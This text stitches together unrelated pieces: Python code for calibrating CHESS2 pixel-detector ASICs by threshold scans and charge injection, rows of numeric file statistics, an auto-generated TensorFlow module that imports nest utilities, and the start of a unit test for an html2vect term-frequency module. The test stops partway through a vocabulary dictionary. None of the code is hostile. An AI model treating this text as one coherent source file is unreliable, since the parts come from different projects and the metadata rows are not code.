    pixels are first written with enable=0 / chargeInj=1 ("disabled").

    Returns:
        allHists: a one-element list with the makeCalibCurveLoopTH result.
    """
    allHists = []
    pixEnable = 1
    chargeInj = 0 # 0 - enable / 1 - disabled
    trim = 7
    # Maximum raw pulse width for the charge injection.
    system.feb.chargeInj.pulseWidthRaw.set(0x7fff)
    print("Disable all pixels")
    system.feb.Chess2Ctrl0.writeAllPixels(enable= 0,chargeInj= 1)
    system.feb.Chess2Ctrl1.writeAllPixels(enable= 0,chargeInj= 1)
    system.feb.Chess2Ctrl2.writeAllPixels(enable= 0,chargeInj= 1)
    print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trim, pixEnable, chargeInj))
    hists = makeCalibCurveLoopTH(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnable, chargeInjLogic = chargeInj, pixTrimI = trim)
    allHists.append(hists)
    return allHists
def configAsicsPreampTest(system = []):
    """Apply the preamp-test bias settings to all three CHESS2 ASICs.

    Writes the same six DAC values (VNatt/VNres, VPLoadatt/VPLoadres,
    VNSFatt/VNSFres) to Chess2Ctrl0, Chess2Ctrl1 and Chess2Ctrl2 — the
    previous copy-pasted triplication is collapsed into one loop.

    NOTE(review): the mutable default ``system = []`` is kept only for
    signature compatibility; callers always pass a real system object.
    """
    for ctrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
        ctrl.VNatt.set(0x1e)
        ctrl.VNres.set(0x1)
        ctrl.VPLoadatt.set(0x1c)
        ctrl.VPLoadres.set(0x2)
        ctrl.VNSFatt.set(0x1f)
        ctrl.VNSFres.set(0x3)
def configAsicsPreampTestRestoreDefaultValues(system=None):
    """Restore the default preamp bias DAC values on all three CHESS2 ASICs.

    Counterpart of the preamp-test configuration: writes the nominal
    register values back to Chess2Ctrl0/1/2.  ``system`` must be the live
    system device tree; the keyword default replaces the original
    mutable-default ``system=[]`` (calling without a real system has always
    failed, so this is backward compatible).
    """
    # Default (register, value) pairs, applied identically to each ASIC.
    defaults = (
        ("VNatt", 0x1F),
        ("VNres", 0x0),
        ("VPLoadatt", 0x1e),
        ("VPLoadres", 0x1),
        ("VNSFatt", 0x1b),
        ("VNSFres", 0x0),
    )
    for ctrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
        for name, value in defaults:
            getattr(ctrl, name).set(value)
def makeCalibCurve4(system, nCounts, thresholdCuts, pixels=None, histFileName="scurve.root", deltaBLToBLR=608, chargeInjectionEnbled=0):
    """BL/BLR calibration scan driven through makeCalibCurveLoopBLx().

    Applies the preamp-test ASIC configuration, disables all pixels, then
    scans thresholds with the BLR DAC tracking BL by ``deltaBLToBLR``
    counts.  ``chargeInjectionEnbled`` selects whether the cal pulse is
    inhibited (the inhibit register takes the negated value).
    Returns a one-element list wrapping the loop's hit data.
    """
    logging.info("Using makeCalibCurve4......")
    # ASIC specific configuration selected depending on the test being run
    configAsicsPreampTest(system=system)
    # configAsicsPreampTestRestoreDefaultValues(system=system)
    enableFlag = 1
    inhibitFlag = not chargeInjectionEnbled  # 0 - enable / 1 - disabled
    trimValue = 7
    system.feb.chargeInj.pulseWidthRaw.set(0x7fff)
    system.feb.chargeInj.calPulseInh.set(inhibitFlag)
    print("Disable all pixels")
    for asicCtrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
        asicCtrl.writeAllPixels(enable=0, chargeInj=1)
    print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trimValue, enableFlag, inhibitFlag))
    return [makeCalibCurveLoopBLx(system, nCounts, thresholdCuts, pixels, histFileName,
                                  pixEnableLogic=enableFlag, chargeInjLogic=inhibitFlag,
                                  pixTrimI=trimValue, deltaBLToBLR=deltaBLToBLR)]
def makeCalibCurveLoop(system, nCounts, thresholdCuts, pixels=None, histFileName="scurve.root", pixEnableLogic=1, chargeInjLogic=0, pixTrimI=0):
    """Scan the BL DAC threshold per pixel and record hit-detection times.

    For every pixel in ``pixels`` (default: the full 128x32 matrix) the same
    pixel is written to all three ASICs, then for each threshold in
    ``thresholdCuts`` the BL DAC is set and ``nCounts`` charge-injection
    pulses are fired.  Each pulse's hit row/column/time per ASIC is appended
    to per-ASIC lists; -1.0 is recorded as the time when no valid hit was
    seen.  ``histFileName`` is accepted for interface compatibility only.

    Returns a list with one entry per (pixel, threshold) pair; each entry is
    a 3-element list (one per ASIC) of hit times.
    """
    nColumns = 32
    nRows = 128
    allHists = []
    logging.info("Using makeCalibCurveLoop......")
    # Turn on one pixel at a time; default to scanning the whole matrix.
    pixels = pixels if (pixels is not None) else [(row, col) for row in range(nRows) for col in range(nColumns)]
    for (row, col) in pixels:
        print("Pixel: (%i,%i)"%(row,col))
        # Enable the same pixel on all three ASICs.
        for ctrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
            ctrl.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI=pixTrimI)
        hists_row = [[], [], []]
        hists_col = [[], [], []]
        for threshold in thresholdCuts:
            hists = [[], [], []]
            print("Thresholds (system.feb.dac.dacBLRaw): ", hex(threshold))
            system.feb.dac.dacBLRaw.set(threshold)
            # This delay is important: it lets the comparator inside the ASIC
            # settle (smaller values tend to make the reported times wrong).
            time.sleep(2.0)
            system.readAll()
            for cnt in range(nCounts):
                # Fire one charge-injection pulse, then read back the hit registers.
                system.feb.chargeInj.calPulseVar.set(1)
                time.sleep(0.1)
                system.readAll()
                # Identical readout of the three ASIC hit-detect register sets
                # (hitDetValid0/1/2, ...); previously three copy-pasted blocks.
                cj = system.feb.chargeInj
                for i_asic in range(3):
                    if getattr(cj, "hitDetValid%i" % i_asic)._rawGet():
                        row_det = int(getattr(cj, "hitDetRow%i" % i_asic)._rawGet())
                        col_det = int(getattr(cj, "hitDetCol%i" % i_asic)._rawGet())
                        hists_row[i_asic].append(row_det)
                        hists_col[i_asic].append(col_det)
                        hitTime = float(getattr(cj, "hitDetTime%i" % i_asic)._rawGet())
                        hists[i_asic].append(hitTime)
                        print("row_det: ", row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime%i: " % i_asic, hitTime)
                    else:
                        hists[i_asic].append(-1.0)
            allHists.append(hists)
    return allHists
def makeCalibCurveLoopBLx(system, nCounts, thresholdCuts, pixels=None, histFileName="scurve.root", pixEnableLogic=1, chargeInjLogic=0, pixTrimI=0, deltaBLToBLR=608):
    """Scan the BL DAC while the BLR DAC tracks it by ``deltaBLToBLR`` counts.

    Same per-pixel / per-threshold scan as makeCalibCurveLoop(), but for each
    threshold both dacBLRRaw (threshold + deltaBLToBLR) and dacBLRaw
    (threshold) are written, and a miss is also logged to stdout.
    ``histFileName`` is accepted for interface compatibility only.

    Returns a list with one entry per (pixel, threshold) pair; each entry is
    a 3-element list (one per ASIC) of hit times (-1.0 on no valid hit).
    """
    nColumns = 32
    nRows = 128
    allHists = []
    logging.info(" Using makeCalibCurveLoopBLx......")
    # Turn on one pixel at a time; default to scanning the whole matrix.
    pixels = pixels if (pixels is not None) else [(row, col) for row in range(nRows) for col in range(nColumns)]
    for (row, col) in pixels:
        print("Pixel: (%i,%i)"%(row,col))
        # Enable the same pixel on all three ASICs.
        for ctrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
            ctrl.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI=pixTrimI)
        hists_row = [[], [], []]
        hists_col = [[], [], []]
        for threshold in thresholdCuts:
            BLRValue = threshold + deltaBLToBLR
            hists = [[], [], []]
            system.feb.dac.dacBLRRaw.set(BLRValue)
            print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(BLRValue))
            system.feb.dac.dacBLRaw.set(threshold)
            print("Thresholds (system.feb.dac.dacBLRaw): ", hex(threshold))
            # This delay is important: it lets the comparator inside the ASIC
            # settle (smaller values tend to make the reported times wrong).
            time.sleep(1.0)
            system.readAll()
            for cnt in range(nCounts):
                # Fire one charge-injection pulse, then read back the hit registers.
                system.feb.chargeInj.calPulseVar.set(1)
                time.sleep(0.05)
                system.readAll()
                # Identical readout of the three ASIC hit-detect register sets
                # (hitDetValid0/1/2, ...); previously three copy-pasted blocks.
                cj = system.feb.chargeInj
                for i_asic in range(3):
                    if getattr(cj, "hitDetValid%i" % i_asic)._rawGet():
                        row_det = int(getattr(cj, "hitDetRow%i" % i_asic)._rawGet())
                        col_det = int(getattr(cj, "hitDetCol%i" % i_asic)._rawGet())
                        hists_row[i_asic].append(row_det)
                        hists_col[i_asic].append(col_det)
                        hitTime = float(getattr(cj, "hitDetTime%i" % i_asic)._rawGet())
                        hists[i_asic].append(hitTime)
                        print("row_det: ", row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime%i: " % i_asic, hitTime)
                    else:
                        hists[i_asic].append(-1.0)
                        print("row_det: ", -1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime%i: " % i_asic, float(-1))
            allHists.append(hists)
    return allHists
def makeCalibCurveLoopTH(system, nCounts, thresholdCuts, pixels=None, histFileName="scurve.root", pixEnableLogic=1, chargeInjLogic=0, pixTrimI=0):
    """Scan the PIXTH DAC threshold per pixel and record hit-detection times.

    Same per-pixel / per-threshold scan as makeCalibCurveLoop(), but the
    threshold is written to dacPIXTHRaw instead of dacBLRaw, and a miss is
    also logged to stdout.  ``histFileName`` is accepted for interface
    compatibility only.

    Returns a list with one entry per (pixel, threshold) pair; each entry is
    a 3-element list (one per ASIC) of hit times (-1.0 on no valid hit).
    """
    nColumns = 32
    nRows = 128
    allHists = []
    logging.info(" Using makeCalibCurveLoopTH......")
    # Turn on one pixel at a time; default to scanning the whole matrix.
    pixels = pixels if (pixels is not None) else [(row, col) for row in range(nRows) for col in range(nColumns)]
    for (row, col) in pixels:
        print("Pixel: (%i,%i)"%(row,col))
        # Enable the same pixel on all three ASICs.
        for ctrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
            ctrl.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI=pixTrimI)
        hists_row = [[], [], []]
        hists_col = [[], [], []]
        for threshold in thresholdCuts:
            hists = [[], [], []]
            print("Thresholds (system.feb.dac.dacPIXTHRaw): ", hex(threshold))
            system.feb.dac.dacPIXTHRaw.set(threshold)
            # This delay is important: it lets the comparator inside the ASIC
            # settle (smaller values tend to make the reported times wrong).
            time.sleep(2.0)
            system.readAll()
            for cnt in range(nCounts):
                # Fire one charge-injection pulse, then read back the hit registers.
                system.feb.chargeInj.calPulseVar.set(1)
                time.sleep(0.1)
                system.readAll()
                # Identical readout of the three ASIC hit-detect register sets
                # (hitDetValid0/1/2, ...); previously three copy-pasted blocks.
                cj = system.feb.chargeInj
                for i_asic in range(3):
                    if getattr(cj, "hitDetValid%i" % i_asic)._rawGet():
                        row_det = int(getattr(cj, "hitDetRow%i" % i_asic)._rawGet())
                        col_det = int(getattr(cj, "hitDetCol%i" % i_asic)._rawGet())
                        hists_row[i_asic].append(row_det)
                        hists_col[i_asic].append(col_det)
                        hitTime = float(getattr(cj, "hitDetTime%i" % i_asic)._rawGet())
                        hists[i_asic].append(hitTime)
                        print("row_det: ", row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime%i: " % i_asic, hitTime)
                    else:
                        hists[i_asic].append(-1.0)
                        print("row_det: ", -1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime%i: " % i_asic, float(-1))
            allHists.append(hists)
    return allHists
def swingTHvsBL(system, nCounts, thresholdCuts, pixels=None, histFileName="scurve.root"):
    """Sweep the BL DAC against a fixed PIXTH operating point.

    Sets fixed PIXTH/BLR/BL values and the charge-injection sweep registers,
    disables all pixels, then delegates to SwingThLoopBLx(vs='BL').
    Returns a one-element list wrapping the loop's hit data.
    """
    logging.info("Using swingTHvsBL......")
    enableFlag = 1
    injFlag = 1
    trimValue = 15
    # Fixed operating point for the comparator inputs.
    system.feb.dac.dacPIXTHRaw.set(0x9ce)
    system.feb.dac.dacBLRRaw.set(0x5c2)
    system.feb.dac.dacBLRaw.set(0x5c2)
    # Charge-injection sweep range and step delay.
    system.feb.memReg.initValueReg.set(0x0)
    system.feb.memReg.endValueReg.set(0xfff)
    system.feb.memReg.delayValueReg.set(0x5)
    print("Disable all pixels")
    for asicCtrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
        asicCtrl.writeAllPixels(enable=0, chargeInj=1)
    print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trimValue, enableFlag, injFlag))
    return [SwingThLoopBLx(system, nCounts, thresholdCuts, pixels, histFileName,
                           pixEnableLogic=enableFlag, chargeInjLogic=injFlag,
                           pixTrimI=trimValue, vs='BL')]
def swingTHvsBLR(system, nCounts, thresholdCuts, pixels=None, histFileName="scurve.root"):
    """Sweep the BLR DAC against a fixed PIXTH operating point.

    Sets fixed PIXTH/BLR/BL values and the charge-injection sweep registers,
    disables all pixels, then delegates to SwingThLoopBLx(vs='BLR').
    Returns a one-element list wrapping the loop's hit data.
    """
    allHists = []
    # Consistency fix: the sibling swingTHvsBL() logs its entry; this one did not.
    logging.info("Using swingTHvsBLR......")
    pixEnable = 1
    chargeInj = 1
    trim = 15
    # Fixed operating point for the comparator inputs.
    system.feb.dac.dacPIXTHRaw.set(0x9ce)
    system.feb.dac.dacBLRRaw.set(0x5c2)
    system.feb.dac.dacBLRaw.set(0x5c2)
    # Charge-injection sweep range and step delay.
    system.feb.memReg.initValueReg.set(0x0)
    system.feb.memReg.endValueReg.set(0xfff)
    system.feb.memReg.delayValueReg.set(0x5)
    print("Disable all pixels")
    system.feb.Chess2Ctrl0.writeAllPixels(enable= 0,chargeInj= 1)
    system.feb.Chess2Ctrl1.writeAllPixels(enable= 0,chargeInj= 1)
    system.feb.Chess2Ctrl2.writeAllPixels(enable= 0,chargeInj= 1)
    print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trim, pixEnable, chargeInj))
    hists = SwingThLoopBLx(system, nCounts, thresholdCuts, pixels, histFileName,
                           pixEnableLogic=pixEnable, chargeInjLogic=chargeInj,
                           pixTrimI=trim, vs='BLR')
    allHists.append(hists)
    return allHists
def SwingThLoopBLx(system, nCounts, thresholdCuts, pixels=None, histFileName="scurve.root", pixEnableLogic=1, chargeInjLogic=0, pixTrimI=0, vs='BL'):
    """Sweep either the BL or BLR DAC per pixel and record hit-detection times.

    ``vs`` selects which DAC the threshold is written to: 'BL' writes
    dacBLRaw, anything else writes dacBLRRaw.  The injection sweep is
    started via the memory register (chargInjStartEventReg) rather than the
    single cal pulse.  ``histFileName`` is accepted for interface
    compatibility only.

    Returns a list with one entry per (pixel, threshold) pair; each entry is
    a 3-element list (one per ASIC) of hit times (-1.0 on no valid hit).
    """
    nColumns = 32
    nRows = 128
    allHists = []
    logging.info("Using SwingThLoopBLx......")
    # Default to scanning the whole pixel matrix one pixel at a time.
    pixels = pixels if (pixels is not None) else [(row, col) for row in range(nRows) for col in range(nColumns)]
    for (row, col) in pixels:
        print("Pixel: (%i,%i)"%(row,col))
        # Enable the same pixel on all three ASICs.
        for ctrl in (system.feb.Chess2Ctrl0, system.feb.Chess2Ctrl1, system.feb.Chess2Ctrl2):
            ctrl.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI=pixTrimI)
        hists_row = [[], [], []]
        hists_col = [[], [], []]
        for threshold in thresholdCuts:
            hists = [[], [], []]
            if (vs == 'BL'):
                system.feb.dac.dacBLRaw.set(threshold)
                print("Thresholds (system.feb.dac.dacBLRaw): ", hex(threshold), ':system.feb.dac.dacBL:', system.feb.dac.dacBL._rawGet())
            else:
                # NOTE(review): in this branch the readback is printed before the
                # new value is written (unlike the BL branch) — preserved as-is.
                print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(threshold), ':system.feb.dac.dacBLR:', system.feb.dac.dacBLR._rawGet())
                system.feb.dac.dacBLRRaw.set(threshold)
            # This delay is important: it lets the comparator inside the ASIC
            # settle (smaller values tend to make the reported times wrong).
            time.sleep(2.0)
            system.readAll()
            for cnt in range(nCounts):
                # Start the charge-injection sweep via the memory register.
                system.feb.memReg.chargInjStartEventReg.set(0)
                time.sleep(0.1)
                system.readAll()
                # Identical readout of the three ASIC hit-detect register sets
                # (hitDetValid0/1/2, ...); previously three copy-pasted blocks.
                cj = system.feb.chargeInj
                for i_asic in range(3):
                    if getattr(cj, "hitDetValid%i" % i_asic)._rawGet():
                        row_det = int(getattr(cj, "hitDetRow%i" % i_asic)._rawGet())
                        col_det = int(getattr(cj, "hitDetCol%i" % i_asic)._rawGet())
                        hists_row[i_asic].append(row_det)
                        hists_col[i_asic].append(col_det)
                        hitTime = float(getattr(cj, "hitDetTime%i" % i_asic)._rawGet())
                        hists[i_asic].append(hitTime)
                        print("row_det: ", row_det, ":col_det:", col_det, ":system.feb.chargeInj.hitDetTime%i: " % i_asic, hitTime)
                    else:
                        hists[i_asic].append(-1.0)
                        print("row_det: ", -1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime%i: " % i_asic, float(-1))
            allHists.append(hists)
    return allHists
| 50.844208
| 186
| 0.632961
| 4,602
| 38,184
| 5.14472
| 0.061712
| 0.099595
| 0.095033
| 0.04663
| 0.90087
| 0.842414
| 0.822816
| 0.809132
| 0.786324
| 0.781889
| 0
| 0.031027
| 0.222606
| 38,184
| 750
| 187
| 50.912
| 0.766575
| 0.264456
| 0
| 0.740741
| 0
| 0
| 0.089958
| 0.042445
| 0
| 0
| 0.006976
| 0
| 0
| 1
| 0.034858
| false
| 0
| 0.013072
| 0
| 0.076253
| 0.106754
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1b84bf348a720ce474d4f69b46a722fd4b0f805
| 752
|
py
|
Python
|
venv/lib/python3.8/site-packages/tensorflow/_api/v2/__internal__/nest/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/nest/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/nest/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.__internal__.nest namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.util.nest import _sequence_like as sequence_like
from tensorflow.python.util.nest import flatten_up_to
from tensorflow.python.util.nest import get_traverse_shallow_structure
from tensorflow.python.util.nest import is_attrs
from tensorflow.python.util.nest import is_mapping
from tensorflow.python.util.nest import list_to_tuple
from tensorflow.python.util.nest import map_structure_up_to
from tensorflow.python.util.nest import yield_flat_paths
del _print_function
| 37.6
| 82
| 0.847074
| 116
| 752
| 5.206897
| 0.422414
| 0.238411
| 0.264901
| 0.317881
| 0.470199
| 0.470199
| 0.245033
| 0.125828
| 0
| 0
| 0
| 0
| 0.093085
| 752
| 19
| 83
| 39.578947
| 0.885631
| 0.230053
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.909091
| 0
| 0.909091
| 0.181818
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a1eaf1c850d95b5db71acf1ec9fd3f8b2b755e0a
| 41,201
|
py
|
Python
|
html2vec/base/vectortypes/unit_tests/test_termslist2tfavgspeed.py
|
dpritsos/html2vectors
|
be5629d6dc2665891472c5795c191286f0de31e7
|
[
"MIT"
] | 7
|
2017-08-31T22:45:46.000Z
|
2022-01-14T21:08:34.000Z
|
html2vec/base/vectortypes/unit_tests/test_termslist2tfavgspeed.py
|
dpritsos/html2vec
|
be5629d6dc2665891472c5795c191286f0de31e7
|
[
"MIT"
] | null | null | null |
html2vec/base/vectortypes/unit_tests/test_termslist2tfavgspeed.py
|
dpritsos/html2vec
|
be5629d6dc2665891472c5795c191286f0de31e7
|
[
"MIT"
] | null | null | null |
#
# Unit Test for html2vect.base.vectortypes.string2tf
#
# Author: Dimitiros Pritsos
#
# License: BSD Style
#
# Last update: Please refer to the GIT tracking
#
import sys
sys.path.append('../../../../')
import unittest
import numpy as np
import scipy.sparse as ssp
from html2vect.base.termstypes.cngrams import String2CNGramsList
from html2vect.base.termstypes.wngrams import String2WNGramsList
from html2vect.base.vectortypes.termslist2tfavgspeed import trms2tfspd_dict
class Test_BaseString2TF(unittest.TestCase):
def setUp(self):
self.s2ngl_c3grams = String2CNGramsList(n=3)
self.s2ngl_words = String2WNGramsList(n=1)
self.s2ngl_w3grams = String2WNGramsList(n=3)
self.txt_sample = "This is a unit test for html2tfd.charngrams.BaseString2TF class for html2vectors package/module"
self.txt_sample = "This This This aaa is a unit test for html2tfd.charngrams.BaseString2TF class aaa for html2vectors package/module"
#I could have the list of Char-3-grams and Word-3-grams, and/or Word-unigrams.
#However the above string will be conveted first to the proper terms list which is the functions' input.
#Terms-Indexs Vocabulary
self.c3grams_tid_vocab = {
' a ' : 0, ' cl' : 1, ' fo' : 2, ' ht' : 3, ' is' : 4, ' pa' : 5,\
' te' : 6, ' un' : 7, '.Ba' : 8, '.ch' : 9, '/mo' : 10, '2TF' : 11,\
'2tf' : 12, '2ve' : 13, 'Bas' : 14, 'F c' : 15, 'Str' : 16, 'TF ' : 17,\
'Thi' : 18, 'a u' : 19, 'ack' : 20, 'age' : 21, 'ams' : 22, 'arn' : 23,\
'ase' : 24, 'ass' : 25, 'cha' : 26, 'cka' : 27, 'cla' : 28, 'cto' : 29,\
'd.c' : 30, 'dul' : 31, 'e/m' : 32, 'eSt' : 33, 'ect' : 34, 'est' : 35,\
'fd.' : 36, 'for' : 37, 'g2T' : 38, 'ge/' : 39, 'gra' : 40, 'har' : 41,\
'his' : 42, 'htm' : 43, 'ing' : 44, 'is ' : 45, 'it ' : 46, 'kag' : 47,\
'l2t' : 48, 'l2v' : 49, 'las' : 50, 'ml2' : 51, 'mod' : 52, 'ms.' : 53,\
'ng2' : 54, 'ngr' : 55, 'nit' : 56, 'odu' : 57, 'or ' : 58, 'ors' : 59,\
'pac' : 60, 'r h' : 61, 'ram' : 62, 'rin' : 63, 'rng' : 64, 'rs ' : 65,\
's a' : 66, 's f' : 67, 's i' : 68, 's p' : 69, 's.B' : 70, 'seS' : 71,\
'ss ' : 72, 'st ' : 73, 't f' : 74, 't t' : 75, 'tes' : 76, 'tfd' : 77,\
'tml' : 78, 'tor' : 79, 'tri' : 80, 'ule' : 81, 'uni' : 82, 'vec' : 83\
}
self.c3grams_tid_vocab_small = {
' a ' : 0, ' cl' : 1, ' fo' : 2, ' ht' : 3, ' is' : 4, ' pa' : 5,\
' te' : 6, ' un' : 7, '.Ba' : 8, '.ch' : 9, '/mo' : 10, '2TF' : 11,\
'2tf' : 12, '2ve' : 13, 'Bas' : 14, 'F c' : 15, 'Str' : 16, 'TF ' : 17,\
'Thi' : 18, 'a u' : 19, 'ack' : 20, 'age' : 21, 'ams' : 22, 'arn' : 23,\
'ase' : 24, 'ass' : 25, 'cha' : 26, 'cka' : 27, 'cla' : 28, 'cto' : 29,\
'd.c' : 30, 'dul' : 31, 'e/m' : 32, 'eSt' : 33, 'ect' : 34, 'est' : 35,\
'fd.' : 36, 'for' : 37, 'g2T' : 38, 'ge/' : 39, 'gra' : 40, 'har' : 41,\
'his' : 42, 'htm' : 43, 'ing' : 44, 'is ' : 45, 'it ' : 46, 'kag' : 47,\
'l2t' : 48, 'l2v' : 49, 'las' : 50, 'ml2' : 51, 'mod' : 52, 'ms.' : 53,\
'ng2' : 54, 'ngr' : 55, 'nit' : 56, 'odu' : 57, 'or ' : 58, 'ors' : 59,\
'pac' : 60,\
}
self.c3grams_tid_vocab_large = {
' a ' : 0, ' cl' : 1, ' fo' : 2, ' ht' : 3, ' is' : 4, ' pa' : 5,\
' te' : 6, ' un' : 7, '.Ba' : 8, '.ch' : 9, '/mo' : 10, '2TF' : 11,\
'2tf' : 12, '2ve' : 13, 'Bas' : 14, 'F c' : 15, 'Str' : 16, 'TF ' : 17,\
'Thi' : 18, 'a u' : 19, 'ack' : 20, 'age' : 21, 'ams' : 22, 'arn' : 23,\
'ase' : 24, 'ass' : 25, 'cha' : 26, 'cka' : 27, 'cla' : 28, 'cto' : 29,\
'd.c' : 30, 'dul' : 31, 'e/m' : 32, 'eSt' : 33, 'ect' : 34, 'est' : 35,\
'fd.' : 36, 'for' : 37, 'g2T' : 38, 'ge/' : 39, 'gra' : 40, 'har' : 41,\
'his' : 42, 'htm' : 43, 'ing' : 44, 'is ' : 45, 'it ' : 46, 'kag' : 47,\
'l2t' : 48, 'l2v' : 49, 'las' : 50, 'ml2' : 51, 'mod' : 52, 'ms.' : 53,\
'ng2' : 54, 'ngr' : 55, 'nit' : 56, 'odu' : 57, 'or ' : 58, 'ors' : 59,\
'pac' : 60, 'r h' : 61, 'ram' : 62, 'rin' : 63, 'rng' : 64, 'rs ' : 65,\
's a' : 66, 's f' : 67, 's i' : 68, 's p' : 69, 's.B' : 70, 'seS' : 71,\
'ss ' : 72, 'st ' : 73, 't f' : 74, 't t' : 75, 'tes' : 76, 'tfd' : 77,\
'tml' : 78, 'tor' : 79, 'tri' : 80, 'ule' : 81, 'uni' : 82, 'vec' : 83,\
'aaa' : 84, 'bbb' : 85, 'ccc' : 86, 'ddd' : 87, 'eee' : 88, 'fff' : 89,\
'ggg' : 90, 'hhh' : 91, 'iii' : 92, 'jjj' : 93, 'kkk' : 94, 'lll' : 95\
}
self.words_tid_vocab = {
'a': 1, 'for': 2, 'This': 3, 'is': 4, 'html2vectors': 5, 'test': 6,\
'package/module': 7, 'html2tfd.charngrams.BaseString2TF': 8, 'class': 9, 'unit': 10\
}
self.words_tid_vocab_small = {
'a': 1, 'for': 2, 'This': 3, 'is': 4, 'html2vectors': 5, 'test': 6,\
'package/module': 7\
}
self.words_tid_vocab_large = {
'a': 1, 'for': 2, 'This': 3, 'is': 4, 'html2vectors': 5, 'test': 6,\
'package/module': 7, 'html2tfd.charngrams.BaseString2TF': 8, 'class': 9,\
'unit': 10, 'aaaword': 11, 'bbbword': 12, 'cccword': 13, 'dddword': 14\
}
self.w3grams_tid_vocab = {
'This is a' : 1, 'unit test for' : 2, 'html2tfd.charngrams.BaseString2TF class for' : 3,\
'is a unit' : 4, 'test for html2tfd.charngrams.BaseString2TF' : 5, 'class for html2vectors' : 6,\
'a unit test' : 7, 'for html2tfd.charngrams.BaseString2TF class' : 8, 'for html2vectors package/module' : 9\
}
self.w3grams_tid_vocab_small = {
'This is a' : 1, 'unit test for' : 2, 'html2tfd.charngrams.BaseString2TF class for' : 3,\
'is a unit' : 4, 'test for html2tfd.charngrams.BaseString2TF' : 5\
}
self.w3grams_tid_vocab_large = {
'This is a' : 1, 'unit test for' : 2, 'html2tfd.charngrams.BaseString2TF class for' : 3,\
'is a unit' : 4, 'test for html2tfd.charngrams.BaseString2TF' : 5, 'class for html2vectors' : 6,\
'a unit test' : 7, 'for html2tfd.charngrams.BaseString2TF class' : 8, 'for html2vectors package/module' : 9,\
'aa bb cc' : 10, 'ee ff gg' : 11, 'hh ii jj' : 12\
}
#Terms-Frequencies (python) Dictionaries
self.expected_c3grams_tf_dict = {
's i': 1, 't t': 1, 'ase': 1, 's a': 1, 'htm': 2, 'ram': 1, 'rs ': 1, 'TF ': 1, 's f': 1,\
'.ch': 1, 't f': 1, ' un': 1, '2tf': 1, 'l2t': 1, 'l2v': 1, 's p': 1, 'eSt': 1, 'tes': 1,\
'ge/': 1, 'ams': 1, 'or ': 2, 'cha': 1, 'est': 1, 'st ': 1, 'Str': 1, 'for': 2, 'tor': 1,\
' is': 1, 'ing': 1, 'cla': 1, 'e/m': 1, 'fd.': 1, 'ml2': 2, 'pac': 1, 'arn': 1, 'ngr': 1,\
'r h': 2, '2TF': 1, 'har': 1, 'is ': 2, 'tml': 2, 'F c': 1, 'ass': 1, 'tri': 1, 'g2T': 1,\
'his': 1, 'kag': 1, 'Bas': 1, '2ve': 1, 'tfd': 1, 'gra': 1, 'rng': 1, 'ors': 1, 'it ': 1,\
'odu': 1, 'mod': 1, ' pa': 1, 'ect': 1, 'ule': 1, 'Thi': 1, 's.B': 1, ' te': 1, '.Ba': 1,\
'nit': 1, 'las': 1, ' a ': 1, 'rin': 1, 'seS': 1, 'cka': 1, ' cl': 1, 'd.c': 1, 'dul': 1,\
'ack': 1, 'age': 1, ' ht': 2, 'ms.': 1, '/mo': 1, 'ng2': 1, 'ss ': 1, 'uni': 1, 'cto': 1,\
'vec': 1, ' fo': 2, 'a u': 1
}
self.expected_c3grams_tf_dict_smallVocab = {
